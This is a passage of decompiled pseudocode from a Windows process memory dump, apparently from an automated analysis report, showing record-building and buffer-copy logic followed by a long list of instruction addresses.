													_t451 =  *(_t528 - 0xa0);
													_t427 = E04F26DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04F2F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04F2F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04F2F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04F2FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04F2FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04F2F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04F2F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04FB4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04F3D130(_t427, _t494, _t511);
				}
			}










































































                                                                                                                                0x04fb5ba5
                                                                                                                                0x04fb5baa
                                                                                                                                0x04fb5baf
                                                                                                                                0x04fb5bb4
                                                                                                                                0x04fb5bb6
                                                                                                                                0x04fb5bbc
                                                                                                                                0x04fb5bbe
                                                                                                                                0x04fb5bc4
                                                                                                                                0x04fb5bcd
                                                                                                                                0x04fb5bd3
                                                                                                                                0x04fb5bd6
                                                                                                                                0x04fb5bdc
                                                                                                                                0x04fb5be0
                                                                                                                                0x04fb5be3
                                                                                                                                0x04fb5beb
                                                                                                                                0x04fb5bf2
                                                                                                                                0x04fb5bf8
                                                                                                                                0x04fb5bfe
                                                                                                                                0x04fb5c04
                                                                                                                                0x04fb5c0e
                                                                                                                                0x04fb5c18
                                                                                                                                0x04fb5c1f
                                                                                                                                0x04fb5c25
                                                                                                                                0x04fb5c2a
                                                                                                                                0x04fb5c2c
                                                                                                                                0x04fb5c32
                                                                                                                                0x04fb5c3a
                                                                                                                                0x04fb5c3f
                                                                                                                                0x04fb5c42
                                                                                                                                0x04fb5c48
                                                                                                                                0x04fb5c5b
                                                                                                                                0x04fb5c5b
                                                                                                                                0x04fb5c2c
                                                                                                                                0x04fb5cb7
                                                                                                                                0x04fb5cb9
                                                                                                                                0x04fb5cbf
                                                                                                                                0x04fb5cc2
                                                                                                                                0x04fb5cca
                                                                                                                                0x04fb5ccb
                                                                                                                                0x04fb5ccb
                                                                                                                                0x04fb5cd1
                                                                                                                                0x04fb5cd7
                                                                                                                                0x04fb5cda
                                                                                                                                0x04fb5ce1
                                                                                                                                0x04fb5ce4
                                                                                                                                0x04fb5ce7
                                                                                                                                0x04fb5ced
                                                                                                                                0x04fb5cf3
                                                                                                                                0x04fb5cf9
                                                                                                                                0x04fb5cff
                                                                                                                                0x04fb5d08
                                                                                                                                0x04fb5d0a
                                                                                                                                0x04fb5d0e
                                                                                                                                0x04fb5d10
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb5d16
                                                                                                                                0x04fb5d1a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb5d20
                                                                                                                                0x04fb5d22
                                                                                                                                0x04fb5d25
                                                                                                                                0x04fb5d2f
                                                                                                                                0x04fb5d2f
                                                                                                                                0x04fb5d33
                                                                                                                                0x04fb5d3d
                                                                                                                                0x04fb5d49
                                                                                                                                0x04fb5d4b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb5d5a
                                                                                                                                0x04fb5d5d
                                                                                                                                0x04fb5d60
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb5d66
                                                                                                                                0x04fb5d69
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb5d6f
                                                                                                                                0x04fb5d6f
                                                                                                                                0x04fb5d73
                                                                                                                                0x04fb5d79
                                                                                                                                0x04fb5d7f
                                                                                                                                0x04fb5d86
                                                                                                                                0x04fb5d95
                                                                                                                                0x04fb5d98
                                                                                                                                0x04fb5dba
                                                                                                                                0x04fb5dcb
                                                                                                                                0x04fb5dce
                                                                                                                                0x04fb5dd3
                                                                                                                                0x04fb5dd6
                                                                                                                                0x04fb5dd8
                                                                                                                                0x04fb5de6
                                                                                                                                0x04fb5dec
                                                                                                                                0x04fb5dee
                                                                                                                                0x04fb5df1
                                                                                                                                0x04fb5df3
                                                                                                                                0x04fb635a
                                                                                                                                0x04fb635a
                                                                                                                                0x00000000
                                                                                                                                0x04fb635a
                                                                                                                                0x04fb5dfe
                                                                                                                                0x04fb5e02
                                                                                                                                0x04fb5e05
                                                                                                                                0x04fb5e07
                                                                                                                                0x04fb5e10
                                                                                                                                0x04fb5e13
                                                                                                                                0x04fb5e1b
                                                                                                                                0x04fb5e1c
                                                                                                                                0x04fb5e21
                                                                                                                                0x04fb5e22
                                                                                                                                0x04fb5e23
                                                                                                                                0x04fb5e25
                                                                                                                                0x04fb5e2a
                                                                                                                                0x04fb5e2c
                                                                                                                                0x04fb5e2e
                                                                                                                                0x04fb5e36
                                                                                                                                0x04fb5e39
                                                                                                                                0x04fb5e42
                                                                                                                                0x04fb5e47
                                                                                                                                0x04fb5e4d
                                                                                                                                0x04fb5e54
                                                                                                                                0x04fb5e54
                                                                                                                                0x04fb5e54
                                                                                                                                0x04fb5e2e
                                                                                                                                0x04fb5e5c
                                                                                                                                0x04fb5e5f
                                                                                                                                0x04fb5e62
                                                                                                                                0x04fb5e64
                                                                                                                                0x04fb5e6b
                                                                                                                                0x04fb5e70
                                                                                                                                0x04fb5e7a
                                                                                                                                0x04fb5e7a
                                                                                                                                0x04fb5e7a
                                                                                                                                0x04fb5e6b
                                                                                                                                0x04fb5e7e
                                                                                                                                0x04fb5e7f
                                                                                                                                0x04fb5e7f
                                                                                                                                0x04fb5e81
                                                                                                                                0x04fb5e87
                                                                                                                                0x04fb5e8b
                                                                                                                                0x04fb5e8c
                                                                                                                                0x04fb5e8c
                                                                                                                                0x04fb5e8c
                                                                                                                                0x04fb5e9a
                                                                                                                                0x04fb5e9c
                                                                                                                                0x04fb5ea2
                                                                                                                                0x04fb5ea6
                                                                                                                                0x04fb5f50
                                                                                                                                0x04fb5f50
                                                                                                                                0x04fb5f57
                                                                                                                                0x04fb5f66
                                                                                                                                0x04fb5f66
                                                                                                                                0x04fb5f66
                                                                                                                                0x04fb5f68
                                                                                                                                0x04fb5f6a
                                                                                                                                0x04fb63d0
                                                                                                                                0x00000000
                                                                                                                                0x04fb5f70
                                                                                                                                0x04fb5f70
                                                                                                                                0x04fb5f91
                                                                                                                                0x04fb5f9c
                                                                                                                                0x04fb5f9e
                                                                                                                                0x04fb5fa4
                                                                                                                                0x04fb5fa6
                                                                                                                                0x04fb638c
                                                                                                                                0x04fb6392
                                                                                                                                0x04fb63a1
                                                                                                                                0x04fb63a7
                                                                                                                                0x04fb63af
                                                                                                                                0x04fb63af
                                                                                                                                0x04fb63bd
                                                                                                                                0x04fb63d8
                                                                                                                                0x00000000
                                                                                                                                0x04fb63d8
                                                                                                                                0x04fb5fac
                                                                                                                                0x04fb5fb2
                                                                                                                                0x04fb5fb4
                                                                                                                                0x04fb5fbd
                                                                                                                                0x04fb5fc6
                                                                                                                                0x04fb5fce
                                                                                                                                0x04fb5fd4
                                                                                                                                0x04fb5fdc
                                                                                                                                0x04fb5fec
                                                                                                                                0x04fb5fed
                                                                                                                                0x04fb5fee
                                                                                                                                0x04fb5fef
                                                                                                                                0x04fb5ff9
                                                                                                                                0x04fb5ffa
                                                                                                                                0x04fb5ffb
                                                                                                                                0x04fb5ffc
                                                                                                                                0x04fb6000
                                                                                                                                0x04fb6004
                                                                                                                                0x04fb6012
                                                                                                                                0x04fb6012
                                                                                                                                0x04fb6018
                                                                                                                                0x04fb6019
                                                                                                                                0x04fb601a
                                                                                                                                0x04fb601b
                                                                                                                                0x04fb601c
                                                                                                                                0x04fb6020
                                                                                                                                0x04fb6059
                                                                                                                                0x04fb605c
                                                                                                                                0x04fb6061
                                                                                                                                0x04fb6061
                                                                                                                                0x04fb6022
                                                                                                                                0x04fb6022
                                                                                                                                0x04fb6022
                                                                                                                                0x04fb6025
                                                                                                                                0x04fb602a
                                                                                                                                0x04fb602b
                                                                                                                                0x04fb6031
                                                                                                                                0x04fb6037
                                                                                                                                0x04fb6038
                                                                                                                                0x04fb603e
                                                                                                                                0x04fb6048
                                                                                                                                0x04fb6049
                                                                                                                                0x04fb604a
                                                                                                                                0x04fb604b
                                                                                                                                0x04fb604c
                                                                                                                                0x04fb604d
                                                                                                                                0x04fb6053
                                                                                                                                0x04fb6054
                                                                                                                                0x04fb6054
                                                                                                                                0x04fb6062
                                                                                                                                0x04fb6065
                                                                                                                                0x04fb6067
                                                                                                                                0x04fb606a
                                                                                                                                0x04fb6070
                                                                                                                                0x04fb6075
                                                                                                                                0x04fb6076
                                                                                                                                0x04fb6081
                                                                                                                                0x04fb6087
                                                                                                                                0x04fb6095
                                                                                                                                0x04fb6099
                                                                                                                                0x04fb609e
                                                                                                                                0x04fb60a4
                                                                                                                                0x04fb60ae
                                                                                                                                0x04fb60b0
                                                                                                                                0x04fb60b3
                                                                                                                                0x04fb60b6
                                                                                                                                0x04fb60b8
                                                                                                                                0x04fb60ba
                                                                                                                                0x04fb60ba
                                                                                                                                0x04fb60ba
                                                                                                                                0x04fb60ba
                                                                                                                                0x04fb60be
                                                                                                                                0x04fb60c0
                                                                                                                                0x04fb60c5
                                                                                                                                0x04fb60c5
                                                                                                                                0x04fb60c5
                                                                                                                                0x04fb60c6
                                                                                                                                0x04fb60cd
                                                                                                                                0x04fb6114
                                                                                                                                0x04fb60cf
                                                                                                                                0x04fb60cf
                                                                                                                                0x04fb60d4
                                                                                                                                0x04fb60d5
                                                                                                                                0x04fb60da
                                                                                                                                0x04fb60db
                                                                                                                                0x04fb60e1
                                                                                                                                0x04fb60e2
                                                                                                                                0x04fb60e8
                                                                                                                                0x04fb60f8
                                                                                                                                0x04fb60fd
                                                                                                                                0x04fb60fe
                                                                                                                                0x04fb6102
                                                                                                                                0x04fb6104
                                                                                                                                0x04fb6107
                                                                                                                                0x04fb6109
                                                                                                                                0x04fb610b
                                                                                                                                0x04fb610b
                                                                                                                                0x04fb610b
                                                                                                                                0x04fb610b
                                                                                                                                0x04fb610f
                                                                                                                                0x04fb610f
                                                                                                                                0x04fb6117
                                                                                                                                0x04fb611a
                                                                                                                                0x04fb611f
                                                                                                                                0x04fb6125
                                                                                                                                0x04fb6134
                                                                                                                                0x04fb6139
                                                                                                                                0x04fb613f
                                                                                                                                0x04fb6146
                                                                                                                                0x04fb6148
                                                                                                                                0x04fb614b
                                                                                                                                0x04fb614d
                                                                                                                                0x04fb614f
                                                                                                                                0x04fb614f
                                                                                                                                0x04fb614f
                                                                                                                                0x04fb614f
                                                                                                                                0x04fb6153
                                                                                                                                0x04fb6159
                                                                                                                                0x04fb6159
                                                                                                                                0x04fb615c
                                                                                                                                0x04fb6163
                                                                                                                                0x04fb6169
                                                                                                                                0x04fb616c
                                                                                                                                0x04fb6172
                                                                                                                                0x04fb6181
                                                                                                                                0x04fb6186
                                                                                                                                0x04fb6187
                                                                                                                                0x04fb618b
                                                                                                                                0x04fb6191
                                                                                                                                0x04fb6195
                                                                                                                                0x04fb61a3
                                                                                                                                0x04fb61bb
                                                                                                                                0x04fb61c0
                                                                                                                                0x04fb61c3
                                                                                                                                0x04fb61cc
                                                                                                                                0x04fb61d0
                                                                                                                                0x04fb61dc
                                                                                                                                0x04fb61de
                                                                                                                                0x04fb61e1
                                                                                                                                0x04fb61e4
                                                                                                                                0x04fb61e6
                                                                                                                                0x04fb61e8
                                                                                                                                0x04fb61e8
                                                                                                                                0x04fb61e8
                                                                                                                                0x04fb61e8
                                                                                                                                0x04fb61e6
                                                                                                                                0x04fb61ec
                                                                                                                                0x04fb61f3
                                                                                                                                0x04fb6203
                                                                                                                                0x04fb6209
                                                                                                                                0x04fb620a
                                                                                                                                0x04fb6216
                                                                                                                                0x04fb621d
                                                                                                                                0x04fb6227
                                                                                                                                0x04fb6241
                                                                                                                                0x04fb6246
                                                                                                                                0x04fb624c
                                                                                                                                0x04fb6257
                                                                                                                                0x04fb6259
                                                                                                                                0x04fb625c
                                                                                                                                0x04fb625e
                                                                                                                                0x04fb6260
                                                                                                                                0x04fb6260
                                                                                                                                0x04fb6260
                                                                                                                                0x04fb6260
                                                                                                                                0x04fb625e
                                                                                                                                0x04fb6264
                                                                                                                                0x04fb6267
                                                                                                                                0x04fb6269
                                                                                                                                0x04fb6315
                                                                                                                                0x04fb6315
                                                                                                                                0x04fb631b
                                                                                                                                0x04fb631e
                                                                                                                                0x04fb6324
                                                                                                                                0x04fb6327
                                                                                                                                0x04fb632f
                                                                                                                                0x04fb6330
                                                                                                                                0x04fb6333
                                                                                                                                0x04fb633a
                                                                                                                                0x04fb633c
                                                                                                                                0x04fb6335
                                                                                                                                0x04fb6335
                                                                                                                                0x04fb6335
                                                                                                                                0x04fb633f
                                                                                                                                0x04fb6342
                                                                                                                                0x04fb634c
                                                                                                                                0x04fb6352
                                                                                                                                0x04fb6355
                                                                                                                                0x04fb6355
                                                                                                                                0x04fb6359
                                                                                                                                0x00000000
                                                                                                                                0x04fb626f
                                                                                                                                0x04fb6275
                                                                                                                                0x04fb6275
                                                                                                                                0x04fb6278
                                                                                                                                0x04fb627e
                                                                                                                                0x04fb627e
                                                                                                                                0x04fb6281
                                                                                                                                0x04fb6287
                                                                                                                                0x04fb628d
                                                                                                                                0x04fb6298
                                                                                                                                0x04fb629c
                                                                                                                                0x04fb62a2
                                                                                                                                0x04fb629e
                                                                                                                                0x04fb629e
                                                                                                                                0x04fb629e
                                                                                                                                0x04fb62a7
                                                                                                                                0x04fb62a7
                                                                                                                                0x04fb62aa
                                                                                                                                0x04fb62b0
                                                                                                                                0x04fb62f0
                                                                                                                                0x04fb62f0
                                                                                                                                0x04fb62f2
                                                                                                                                0x04fb62f8
                                                                                                                                0x04fb62fd
                                                                                                                                0x04fb62b2
                                                                                                                                0x04fb62b2
                                                                                                                                0x04fb62b2
                                                                                                                                0x04fb62b5
                                                                                                                                0x04fb62dd
                                                                                                                                0x04fb62e2
                                                                                                                                0x04fb62e5
                                                                                                                                0x04fb62b7
                                                                                                                                0x04fb62b8
                                                                                                                                0x04fb62bb
                                                                                                                                0x04fb62bd
                                                                                                                                0x04fb62c0
                                                                                                                                0x04fb62c4
                                                                                                                                0x04fb62cd
                                                                                                                                0x04fb62cd
                                                                                                                                0x04fb62c0
                                                                                                                                0x04fb62bb
                                                                                                                                0x04fb62b5
                                                                                                                                0x04fb6302
                                                                                                                                0x04fb6303
                                                                                                                                0x04fb6305
                                                                                                                                0x04fb6305
                                                                                                                                0x04fb6305
                                                                                                                                0x04fb630c
                                                                                                                                0x04fb630c
                                                                                                                                0x00000000
                                                                                                                                0x04fb627e
                                                                                                                                0x04fb6269
                                                                                                                                0x04fb5eac
                                                                                                                                0x04fb5ebb
                                                                                                                                0x04fb5ebe
                                                                                                                                0x04fb5ecb
                                                                                                                                0x04fb5ecb
                                                                                                                                0x04fb5ece
                                                                                                                                0x04fb5ece
                                                                                                                                0x04fb5ed4
                                                                                                                                0x04fb5ed7
                                                                                                                                0x04fb5ed9
                                                                                                                                0x04fb5edb
                                                                                                                                0x04fb5edb
                                                                                                                                0x04fb5ee1
                                                                                                                                0x04fb5ee1
                                                                                                                                0x04fb5ee3
                                                                                                                                0x04fb5f20
                                                                                                                                0x04fb5f20
                                                                                                                                0x04fb5ee5
                                                                                                                                0x04fb5ee5
                                                                                                                                0x04fb5ee5
                                                                                                                                0x04fb5ee8
                                                                                                                                0x04fb5f11
                                                                                                                                0x04fb5f18
                                                                                                                                0x04fb5eea
                                                                                                                                0x04fb5eea
                                                                                                                                0x04fb5eed
                                                                                                                                0x04fb5ef2
                                                                                                                                0x04fb5ef8
                                                                                                                                0x04fb5efb
                                                                                                                                0x04fb5f0a
                                                                                                                                0x04fb5f0a
                                                                                                                                0x04fb5eed
                                                                                                                                0x04fb5ee8
                                                                                                                                0x04fb5f22
                                                                                                                                0x04fb5f28
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb5f30
                                                                                                                                0x04fb5f31
                                                                                                                                0x04fb5f37
                                                                                                                                0x04fb5f3a
                                                                                                                                0x04fb5f3d
                                                                                                                                0x04fb5f44
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb5f46
                                                                                                                                0x04fb5f48
                                                                                                                                0x04fb5f4d
                                                                                                                                0x00000000
                                                                                                                                0x04fb5f4d
                                                                                                                                0x04fb5dda
                                                                                                                                0x04fb5ddf
                                                                                                                                0x00000000
                                                                                                                                0x04fb5ddf
                                                                                                                                0x04fb5dd8
                                                                                                                                0x04fb5da7
                                                                                                                                0x04fb5da9
                                                                                                                                0x04fb5dac
                                                                                                                                0x04fb5dae
                                                                                                                                0x00000000
                                                                                                                                0x04fb5db4
                                                                                                                                0x04fb5db4
                                                                                                                                0x00000000
                                                                                                                                0x04fb5db4
                                                                                                                                0x04fb5dae
                                                                                                                                0x04fb5d88
                                                                                                                                0x04fb5d8d
                                                                                                                                0x04fb6363
                                                                                                                                0x04fb6369
                                                                                                                                0x04fb636a
                                                                                                                                0x04fb6370
                                                                                                                                0x04fb6372
                                                                                                                                0x04fb637a
                                                                                                                                0x04fb637b
                                                                                                                                0x04fb637d
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb637f
                                                                                                                                0x04fb6385
                                                                                                                                0x00000000
                                                                                                                                0x04fb6385
                                                                                                                                0x04fb5d38
                                                                                                                                0x04fb5d3b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb5d3b
                                                                                                                                0x04fb5d27
                                                                                                                                0x04fb5d29
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04fb6360
                                                                                                                                0x00000000
                                                                                                                                0x04fb6360
                                                                                                                                0x04fb5c10
                                                                                                                                0x04fb5c10
                                                                                                                                0x04fb63da
                                                                                                                                0x04fb63e5
                                                                                                                                0x04fb63e5

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
